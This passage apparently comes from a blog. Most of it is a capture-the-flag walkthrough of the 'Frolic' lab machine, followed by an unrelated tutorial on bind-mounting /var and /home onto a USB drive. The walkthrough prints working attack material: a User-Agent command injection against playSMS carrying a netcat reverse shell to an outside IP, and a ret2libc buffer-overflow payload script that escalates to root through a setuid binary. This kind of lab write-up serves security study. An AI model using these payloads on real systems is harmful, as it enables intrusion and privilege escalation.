4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a

Decoding the hex string is done with the command xxd -r -p index.php and reveals a Base64 encoded string

KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr
KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg
K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t
LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==

By using the command cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d the decoded data is obtained

+++++ +++++ [->++ +++++ +++<] >++++ +.--- --.++ +++++ .<+++ [->++ +<]>+
++.<+ ++[-> ---<] >---- --.-- ----- .<+++ +[->+ +++<] >+++. <+++[ ->---
<]>-- .<+++ [->++ +<]>+ .---. <+++[ ->--- <]>-- ----. <++++ [->++ ++<]>
++..<

By decoding the brainfuck code, the string idkwhatispass is obtained.
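
The whole chain (hex, then Base64, then brainfuck) can be reproduced in Python. The sketch below is illustrative rather than the tooling used for this post: run_bf is a small interpreter without input support, peel is a hypothetical helper, and the hex layer is rebuilt from the Base64 lines shown above instead of being read from index.php.

```python
import base64


def run_bf(code: str, tape_len: int = 30000) -> str:
    """Run a brainfuck program (no ',' input support) and return its output."""
    stack, jump = [], {}
    for index, char in enumerate(code):  # pair up the brackets first
        if char == "[":
            stack.append(index)
        elif char == "]":
            start = stack.pop()
            jump[start], jump[index] = index, start
    tape, ptr, pc, out = [0] * tape_len, 0, 0, []
    while pc < len(code):
        char = code[pc]
        if char == ">":
            ptr += 1
        elif char == "<":
            ptr -= 1
        elif char == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif char == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif char == ".":
            out.append(chr(tape[ptr]))
        elif char == "[" and tape[ptr] == 0:
            pc = jump[pc]
        elif char == "]" and tape[ptr] != 0:
            pc = jump[pc]
        pc += 1
    return "".join(out)


def peel(hex_text: str) -> str:
    """Undo the hex layer and then the Base64 layer."""
    return base64.b64decode(bytes.fromhex(hex_text)).decode("ascii")


B64_LINES = [
    "KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKy4tLS0gLS0uKysgKysrKysgLjwr",
    "KysgWy0+KysgKzxdPisKKysuPCsgKytbLT4gLS0tPF0gPi0tLS0gLS0uLS0gLS0tLS0gLjwrKysg",
    "K1stPisgKysrPF0gPisrKy4gPCsrK1sgLT4tLS0KPF0+LS0gLjwrKysgWy0+KysgKzxdPisgLi0t",
    "LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS0tLS4gPCsrKysgWy0+KysgKys8XT4KKysuLjwgCg==",
]
# Stand-in for the content of index.php: the Base64 lines, hex encoded.
hex_layer = "\r\n".join(B64_LINES).encode("ascii").hex()
print(run_bf(peel(hex_layer)))
```

The interpreter ignores any character that is not a brainfuck instruction, so the spaces and line breaks in the decoded program do not need to be removed.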

Further scanning is done with the ffuf command that scans recursively to locate any other directories/pages that weren't found on the first scan

ffuf -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -recursion -recursion-depth 1 -u http://frolic.htb:9999/FUZZ -c -ic -v -replay-proxy http://127.0.0.1:8080 -o scans/ffuf.recursive.9999.json

One relevant result is found in the URL http://frolic.htb:9999/dev/backup/ where the page only has the string /playsms and accessing the URL http://frolic.htb:9999/playsms shows the playSMS page.

playSMS Service

By using the credentials that were found, access was gained to the playSMS service with an admin account.

The version of playSMS in use could not be determined, so it is assumed that one of the file upload vulnerabilities for version 1.4 may work

---------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                          |  Path
---------------------------------------------------------------------------------------- ---------------------------------
PlaySMS - 'import.php' (Authenticated) CSV File Upload Code Execution (Metasploit)      | php/remote/44598.rb
PlaySMS - index.php Unauthenticated Template Injection Code Execution (Metasploit)      | php/remote/48335.rb
PlaySms 0.7 - SQL Injection                                                             | linux/remote/404.pl
PlaySms 0.8 - 'index.php' Cross-Site Scripting                                          | php/webapps/26871.txt
PlaySms 0.9.3 - Multiple Local/Remote File Inclusions                                   | php/webapps/7687.txt
PlaySms 0.9.5.2 - Remote File Inclusion                                                 | php/webapps/17792.txt
PlaySms 0.9.9.2 - Cross-Site Request Forgery                                            | php/webapps/30177.txt
PlaySMS 1.4 - '/sendfromfile.php' Remote Code Execution / Unrestricted File Upload      | php/webapps/42003.txt
PlaySMS 1.4 - 'import.php' Remote Code Execution                                        | php/webapps/42044.txt
PlaySMS 1.4 - 'sendfromfile.php?Filename' (Authenticated) 'Code Execution (Metasploit)  | php/remote/44599.rb
PlaySMS 1.4 - Remote Code Execution                                                     | php/webapps/42038.txt
PlaySMS 1.4.3 - Template Injection / Remote Code Execution                              | php/webapps/48199.txt
---------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results

The first attempt uses exploit 42003, which relies on a CSV file upload that is not validated and allows for RCE. This was unsuccessful: it appears that the application does check for a valid filename and doesn't execute any PHP code placed in the filename.

The second attempt uses exploit 42044, which also relies on a CSV file, this time uploaded to the Phonebook, accessible via My Account -> Phonebook. The exploit depends on changing the value of the User-Agent header in the request, which is then executed by the page; no file is written to disk. The content of the CSV file is shown below

Name,Mobile,Email,Group code,Tags
,2,,,

The request header in the upload process is then changed to

POST http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import HTTP/1.1
Host: frolic.htb:9999
User-Agent: id; hostname
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------72950579317560938561223174980
Content-Length: 457
Origin: http://frolic.htb:9999
DNT: 1
Connection: keep-alive
Referer: http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
Cookie: PHPSESSID=6rl9keisf6lf85dib15uvtgve1
Upgrade-Insecure-Requests: 1

As a result, the page that confirms the upload shows the output of the command.

In order to establish a reverse shell, the following request is sent in this process

POST http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=import HTTP/1.1
Host: frolic.htb:9999
User-Agent: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.62 4444 >/tmp/f
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: multipart/form-data; boundary=---------------------------93784517437469769342519032468
Content-Length: 457
Origin: http://frolic.htb:9999
DNT: 1
Connection: keep-alive
Referer: http://frolic.htb:9999/playsms/index.php?app=main&inc=feature_phonebook&route=import&op=list
Cookie: PHPSESSID=6rl9keisf6lf85dib15uvtgve1
Upgrade-Insecure-Requests: 1

-----------------------------93784517437469769342519032468
Content-Disposition: form-data; name="X-CSRF-Token"

56cecb3aafb890acde113ea8ba5ef2ab
-----------------------------93784517437469769342519032468
Content-Disposition: form-data; name="fnpb"; filename="test.csv"
Content-Type: text/csv

Name,Mobile,Email,Group code,Tags
,2,,,

-----------------------------93784517437469769342519032468--

This manages to successfully establish the reverse shell as the www-data user

❯ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.129.163.216 52410
/bin/sh: 0: can't access tty; job control turned off
$ id; hostname; pwd
uid=33(www-data) gid=33(www-data) groups=33(www-data)
frolic
/var/www/html/playsms
$

The config.php file contains the credentials for the MySQL database



Shell Access

www-data

The reverse shell is obtained with the user www-data and the user flag is readable by this service account

$ ls -la /home/ayush
total 36
drwxr-xr-x 3 ayush ayush 4096 Sep 25  2018 .
drwxr-xr-x 4 root  root  4096 Sep 23  2018 ..
-rw------- 1 ayush ayush 2781 Sep 25  2018 .bash_history
-rw-r--r-- 1 ayush ayush  220 Sep 23  2018 .bash_logout
-rw-r--r-- 1 ayush ayush 3771 Sep 23  2018 .bashrc
drwxrwxr-x 2 ayush ayush 4096 Sep 25  2018 .binary
-rw-r--r-- 1 ayush ayush  655 Sep 23  2018 .profile
-rw------- 1 ayush ayush  965 Sep 25  2018 .viminfo
-rwxr-xr-x 1 ayush ayush   33 Sep 25  2018 user.txt
$ cat /home/ayush/user.txt
2ab95909cf509f85a6f476b59a0c2fe0


One directory that does not belong to the default structure of a user's home directory is .binary

$ ls -Al /home/ayush/.binary
total 8
-rwsr-xr-x 1 root root 7480 Sep 25  2018 rop
$ file /home/ayush/.binary/rop
/home/ayush/.binary/rop: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=59da91c100d138c662b77627b65efbbc9f797394, not stripped


Privilege Escalation

The binary rop (MD5 001d6cf82093a0d716587169e019de7d) is downloaded from the remote system for further analysis.

When executing the program, it shows the following message

$ /home/ayush/.binary/rop
[*] Usage: program <message>


When adding any string, as mentioned in the usage message, it simply prints it to the screen.

The Radare2 container has the 32-bit libraries necessary to run the binary; it can be started with the following command

podman run -v ./:/mnt -it --rm --cap-drop=ALL --cap-add=SYS_PTRACE --entrypoint bash docker.io/radare/radare2


Loading the binary in Radare2 for assembly analysis shows two relevant functions: main and sym.vuln.
The main function checks whether the parameter count is greater than 1 and, if so, calls the sym.vuln function; otherwise, it prints the usage message and exits the application.

     0x080484b6      83c410         add esp, 0x10
     0x080484b9      833b01         cmp dword [ebx], 1           ; Check if parameter count is equal to 1
.--< 0x080484bc      7f17           jg 0x80484d5                 ; jump if parameter count is greater than 1
|    0x080484be      83ec0c         sub esp, 0xc
|    0x080484c1      68c0850408     push str.___Usage:_program__message_ ; 0x80485c0 ; "[*] Usage: program <message>" ; const char *s
|    0x080484c6      e895feffff     call sym.imp.puts           ; int puts(const char *s)
|    0x080484cb      83c410         add esp, 0x10
|    0x080484ce      b8ffffffff     mov eax, 0xffffffff         ; -1
|    0x080484d3      eb19           jmp 0x80484ee               ; jumps to exit
|    ; CODE XREF from main @ 0x80484bc
'--> 0x080484d5      8b4304         mov eax, dword [ebx + 4]
     0x080484d8      83c004         add eax, 4
     0x080484db      8b00           mov eax, dword [eax]
     0x080484dd      83ec0c         sub esp, 0xc
     0x080484e0      50             push eax                    ; int32_t arg_8h
     0x080484e1      e812000000     call sym.vuln               ; Call to function that prints the entered value to the screen


The sym.vuln function calls strcpy without validating the length of the data passed in the argument, and this is where the buffer overflow (BoF) takes place

┌ 58: sym.vuln (char *src);
│           ; var char *format @ ebp-0x30
│           ; arg char *src @ ebp+0x8
│           0x080484f8      55             push ebp
│           0x080484f9      89e5           mov ebp, esp
│           0x080484fb      83ec38         sub esp, 0x38
│           0x080484fe      83ec08         sub esp, 8
│           0x08048501      ff7508         push dword [src]            ; const char *src
│           0x08048504      8d45d0         lea eax, [format]
│           0x08048507      50             push eax                    ; char *dest
│           0x08048508      e843feffff     call sym.imp.strcpy         ; char *strcpy(char *dest, const char *src)
│           0x0804850d      83c410         add esp, 0x10
│           0x08048510      83ec0c         sub esp, 0xc
│           0x08048513      68dd850408     push str.___Message_sent:_  ; 0x80485dd ; "[+] Message sent: " ; const char *format
│           0x08048518      e823feffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0804851d      83c410         add esp, 0x10
│           0x08048520      83ec0c         sub esp, 0xc
│           0x08048523      8d45d0         lea eax, [format]
│           0x08048526      50             push eax                    ; const char *format
│           0x08048527      e814feffff     call sym.imp.printf         ; int printf(const char *format)
│           0x0804852c      83c410         add esp, 0x10
│           0x0804852f      90             nop
│           0x08048530      c9             leave
└           0x08048531      c3             ret


The instruction at the address 0x080484fb subtracts 0x38 from the value of the esp register, which reserves 56 bytes on the stack for local variables.
By creating a De Bruijn string with the command ragg2 -rP 56, it is possible to find the exact number of bytes needed to reach the return address. The generated string is AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA, and the binary is executed with it inside Radare2 as shown below

[0xf7f79549]> doo AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA
Process with PID 7 started...                        
= attach 7 7                        
File dbg:///mnt/rop  AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA reopened in read-write mode
7                     
[0xf7f0a0b0]> dc                             
[+] SIGNAL 11 errno=0 addr=0x41534141 code=1 si_pid=1095975233 ret=0 


Now check the registers with the command dr=

[0x41534141]> dr=
    eax 0x00000038      ebx 0xffba42b0      ecx 0x00000000      edx 0xf7ef9890
    esi 0xf7ef8000      edi 0xf7ef8000      esp 0xffba4280      ebp 0x52414151
    eip 0x41534141   eflags 0x00010282     oeax 0xffffffff  


The eip register is the relevant one in this case. The pattern bytes that landed in it reveal how much padding is needed before the return address is overwritten, and therefore where the payload has to start. The output below shows the number of bytes needed

[0x41534141]> wopO `dr eip`
52
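
The same offset can be cross-checked outside of Radare2. The snippet below is a minimal sketch, assuming the 56-byte pattern shown earlier and the little-endian byte order of x86; the helper name pattern_offset is illustrative and not part of any tool.

```python
from struct import pack

# De Bruijn pattern produced by `ragg2 -rP 56` in the text above.
pattern = "AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAANAAOAAPAAQAARAASA"


def pattern_offset(pattern: str, register_value: int) -> int:
    """Return the index in the pattern of the 4 bytes found in a 32-bit register."""
    # x86 is little-endian, so 0x41534141 was loaded from the bytes 41 41 53 41.
    needle = pack("<I", register_value).decode("ascii")
    return pattern.find(needle)


eip_offset = pattern_offset(pattern, 0x41534141)  # value of eip after the crash
ebp_offset = pattern_offset(pattern, 0x52414151)  # value of ebp after the crash
print(eip_offset, ebp_offset)
```

The saved ebp sits directly below the return address on the stack, so its offset is expected to be four bytes smaller than the one reported for eip.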


This can be confirmed by generating a new string with 52 A characters followed by 4 B characters, for example with the command python -c "print('A'*52 + 'BBBB')". When the application is run with this string, the eip register should hold the value 0x42424242

[0x41534141]> doo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Process with PID 8 started...
= attach 8 8
File dbg:///mnt/rop  AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB reopened in read-write mode
8
[0xf7ef70b0]> dc
[+] SIGNAL 11 errno=0 addr=0x42424242 code=1 si_pid=1111638594 ret=0
[0x42424242]> drr
role reg    value    refstr
―――――――――――――――――――――――――――
A0   eax    38       56 .shstrtab eax ascii ('8')
A1   ebx    ffee7680 [stack] ebx stack R W 0x2
A2   ecx    0        0
A3   edx    f7ee6890 edx
     esi    f7ee5000 esi,edi
     edi    f7ee5000 esi,edi
SP   esp    ffee7650 [stack] esp stack R W 0xffee7800
BP   ebp    41414141 ebp ascii ('A')
PC   eip    42424242 eip ascii ('B')
     xfs    0        0
     xgs    63       99 .shstrtab ascii ('c')
     xcs    23       35 .comment ascii ('#')
     xss    2b       43 .comment ascii ('+')
     eflags 10282    eflags
SN   oeax   ffffffff -1 oeax


Checking the binary details with the i command shows that NX is enabled, so the stack is not executable and shellcode placed there will not run. For this reason it is necessary to build a ROP chain that spawns a shell with access to the root account.
Because this protection is enabled, the chain relies on a few objects in the libc.so.6 library that is loaded on the target host. They are located with the following steps
Obtain the base address at which libc.so.6 is loaded with the command ldd rop. For this instance the address is 0xb7e19000 and the path of the library is /lib/i386-linux-gnu/libc.so.6
Obtain the offset of the system function with the command readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "system". For this instance the offset is 0x0003ada0
Obtain the offset of the exit function with the command readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "exit". For this instance the offset is 0x0002e9d0
Obtain the offset of the /bin/sh string with the command strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh". For this instance the offset is 0x15ba0b

Below is the output of all the commands mentioned in the steps above

$ ldd rop
        linux-gate.so.1 =>  (0xb7fda000)
        libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000)
        /lib/ld-linux.so.2 (0xb7fdb000)
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "system"
   245: 00112f20    68 FUNC    GLOBAL DEFAULT   13 svcerr_systemerr@@GLIBC_2.0
   627: 0003ada0    55 FUNC    GLOBAL DEFAULT   13 __libc_system@@GLIBC_PRIVATE
  1457: 0003ada0    55 FUNC    WEAK   DEFAULT   13 system@@GLIBC_2.0
$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep "exit"
   112: 0002edc0    39 FUNC    GLOBAL DEFAULT   13 __cxa_at_quick_exit@@GLIBC_2.10
   141: 0002e9d0    31 FUNC    GLOBAL DEFAULT   13 exit@@GLIBC_2.0
   450: 0002edf0   197 FUNC    GLOBAL DEFAULT   13 __cxa_thread_atexit_impl@@GLIBC_2.18
   558: 000b07c8    24 FUNC    GLOBAL DEFAULT   13 _exit@@GLIBC_2.0
   616: 00115fa0    56 FUNC    GLOBAL DEFAULT   13 svc_exit@@GLIBC_2.0
   652: 0002eda0    31 FUNC    GLOBAL DEFAULT   13 quick_exit@@GLIBC_2.10
   876: 0002ebf0    85 FUNC    GLOBAL DEFAULT   13 __cxa_atexit@@GLIBC_2.1.3
  1046: 0011fb80    52 FUNC    GLOBAL DEFAULT   13 atexit@GLIBC_2.0
  1394: 001b2204     4 OBJECT  GLOBAL DEFAULT   33 argp_err_exit_status@@GLIBC_2.1
  1506: 000f3870    58 FUNC    GLOBAL DEFAULT   13 pthread_exit@@GLIBC_2.0
  2108: 001b2154     4 OBJECT  GLOBAL DEFAULT   33 obstack_exit_failure@@GLIBC_2.0
  2263: 0002e9f0    78 FUNC    WEAK   DEFAULT   13 on_exit@@GLIBC_2.0
  2406: 000f4c80     2 FUNC    GLOBAL DEFAULT   13 __cyg_profile_func_exit@@GLIBC_2.2
$ strings -tx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh"
 15ba0b /bin/sh


Each offset needs to be added to the base address of the libc.so.6 library to obtain the absolute addresses used in the chain

[0x42424242]> ?v 0xb7e19000 + 0x0003ada0
0xb7e53da0
[0x42424242]> ?v 0xb7e19000 + 0x0002e9d0
0xb7e479d0
[0x42424242]> ?v 0xb7e19000 + 0x15ba0b
0xb7f74a0b
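
The same arithmetic can be scripted, which is convenient when the base address or the offsets change between hosts. This is a minimal sketch that assumes the base address and offsets listed above; the names LIBC_BASE, OFFSETS and resolve are illustrative.

```python
# Values taken from the ldd, readelf and strings output above.
LIBC_BASE = 0xB7E19000
OFFSETS = {
    "system": 0x0003ADA0,
    "exit": 0x0002E9D0,
    "/bin/sh": 0x15BA0B,
}


def resolve(base: int, offsets: dict) -> dict:
    """Add each libc offset to the load address, wrapped to 32 bits."""
    return {name: (base + offset) & 0xFFFFFFFF for name, offset in offsets.items()}


addresses = resolve(LIBC_BASE, OFFSETS)
for name, address in addresses.items():
    print(f"{name:8} {address:#010x}")
```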


These values can now be used in a Python script that generates the payload used to exploit the binary and achieve privilege escalation

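from struct import pack
from base64 import b64encode

padding = b'A' * 52                       # bytes needed to reach the saved return address
system_address = pack('<I', 0xb7e53da0)   # libc base + offset of system
exit_address = pack('<I', 0xb7e479d0)     # libc base + offset of exit, used as the return address of system
binsh_address = pack('<I', 0xb7f74a0b)    # libc base + offset of "/bin/sh", the argument passed to system

print(b64encode(padding + system_address + exit_address + binsh_address).decode())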


The output string is encoded in Base64, which makes it easier to copy it over to the target host to exploit the binary

$ ./rop $(echo QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQaA95bfQeeS3C0r3tw== | base64 -d)
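
As a sanity check, the Base64 string can be decoded again to confirm that it carries the expected layout. The snippet below is a minimal sketch, assuming the chain consists of three little-endian 32-bit values at the end of the payload; the variable names are illustrative.

```python
from base64 import b64decode
from struct import unpack

# Base64 string passed to the binary in the command above.
encoded = (
    "QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"
    "QaA95bfQeeS3C0r3tw=="
)

payload = b64decode(encoded)

# Assumption: the last 12 bytes are the three 32-bit addresses of the chain,
# and everything before them is padding.
padding, chain = payload[:-12], payload[-12:]
system_addr, exit_addr, binsh_addr = unpack("<3I", chain)

print(f"padding length: {len(padding)}")
print(f"system:  {system_addr:#010x}")
print(f"exit:    {exit_addr:#010x}")
print(f"/bin/sh: {binsh_addr:#010x}")
```

The order matters on 32-bit x86: the value that follows the address of system on the stack is treated as its return address, and the value after that as its first argument.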


The command above successfully exploits the BoF vulnerability in the binary, and privilege escalation is achieved.



Bind Linux Directories
Wed, 29 Sep 2021 16:34:14 +0000
I wanted to move the /var and /home directories from the MicroSD card to a USB flash drive, because those two directories see the most activity and benefit the most from being moved off the MicroSD card.

It’s easy to put each directory on its own partition, but I didn’t want to partition a single USB thumb drive or use a separate thumb drive for each directory, so I looked into keeping both directories in one partition. This can be achieved with bind mounts.

First, create the filesystem on the desired thumb drive partition

sudo mkfs.ext4 -O ^has_journal /dev/sdxn


This creates an ext4 filesystem on the thumb drive without journaling, which lowers the number of writes made to the drive.

Once the partition is created and mounted (at /mnt/usb in this example), create the directories you want to move to the drive. In my case I created home and var with the following commands

sudo mkdir /mnt/usb/var

sudo mkdir /mnt/usb/home


Because I’m doing this on a system that hasn’t been fully set up yet, there is nothing in home and therefore nothing to copy from there. var, however, does have files that need to be copied over, so I ran this command

sudo cp -ax /var/* /mnt/usb/var


After the copy completes, you can check the directory to see everything that was copied over. As an extra step I created an empty file named notusb in each of the original directories, with the sole purpose of knowing when the directory isn’t mounted from the USB drive.

You can either leave the original contents of the directories as they are or remove them, which is advisable if you want that space back. I decided to leave them.

Once everything has been copied over, edit fstab so that everything is mounted at boot time. Use your favorite editor and add the following line

/mnt/usb/var /var none bind


I also added another line for home, but you get the idea. The drive itself has to be mounted before the bind mounts can work, so be sure to add the drive to the fstab as well.

Use the UUID of the partition to identify it, as this ensures that this specific partition is mounted and not some other device that happens to get the same device name. To obtain it, run the following command

sudo blkid | grep /dev/sdxn


Where sdxn is the same device used in the command above to create the filesystem. This should return one line with the UUID of the partition. If it doesn’t, run the blkid command on its own and look through all of the output.

You should see a line like

/dev/sda1: UUID="f6e6oe58-467c-ae79-9cf4-000199562b81" TYPE="ext4" PARTUUID="fe096750-02"


Take the UUID value without the quotes and place it in the fstab line that defines the mount point for the drive

UUID=f6e6oe58-467c-ae79-9cf4-000199562b81 /mnt/usb ext4 defaults,noatime 0 0
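
Copying the UUID by hand is easy to get wrong, so the fstab line can also be built from the blkid output. The snippet below is a minimal sketch, assuming blkid prints KEY="value" pairs as in the sample above; the function name fstab_entry_from_blkid and the UUID in the sample line are hypothetical.

```python
import re


def fstab_entry_from_blkid(line: str, mount_point: str,
                           options: str = "defaults,noatime") -> str:
    """Build an fstab line from a single line of blkid output."""
    # \b keeps PARTUUID= and PTTYPE= from matching the UUID= and TYPE= patterns.
    uuid = re.search(r'\bUUID="([^"]+)"', line)
    fstype = re.search(r'\bTYPE="([^"]+)"', line)
    if uuid is None or fstype is None:
        raise ValueError("blkid line has no UUID or TYPE field")
    return f"UUID={uuid.group(1)} {mount_point} {fstype.group(1)} {options} 0 0"


# Hypothetical blkid output; replace it with the line from your own system.
sample = ('/dev/sda1: UUID="01234567-89ab-cdef-0123-456789abcdef" '
          'TYPE="ext4" PARTUUID="fe096750-02"')
entry = fstab_entry_from_blkid(sample, "/mnt/usb")
print(entry)
```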


At this point everything is set, and it is just a matter of mounting everything manually. If you can reboot, though, I recommend doing that instead, as it verifies that the mounts are carried out correctly when the device boots.

I check whether the notusb file exists in either directory. If it doesn’t, everything worked as expected and I can continue setting up the system.
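
The marker check can be automated, for example at the start of a setup script. This is a minimal sketch, assuming the marker file is named notusb and lives only in the original directories; the function name bind_mount_active is illustrative.

```python
from pathlib import Path


def bind_mount_active(directory: str, marker: str = "notusb") -> bool:
    """Return True when the marker file is hidden, meaning the bind mount is in place."""
    # The marker exists only in the original directory on the MicroSD card,
    # so it is visible only while nothing is mounted over that directory.
    return not (Path(directory) / marker).exists()


for directory in ("/var", "/home"):
    state = "bind mount active" if bind_mount_active(directory) else "NOT mounted from USB"
    print(f"{directory}: {state}")
```

Note that a directory without the marker is reported as active, so the check is only meaningful on a system where the marker files were created as described above.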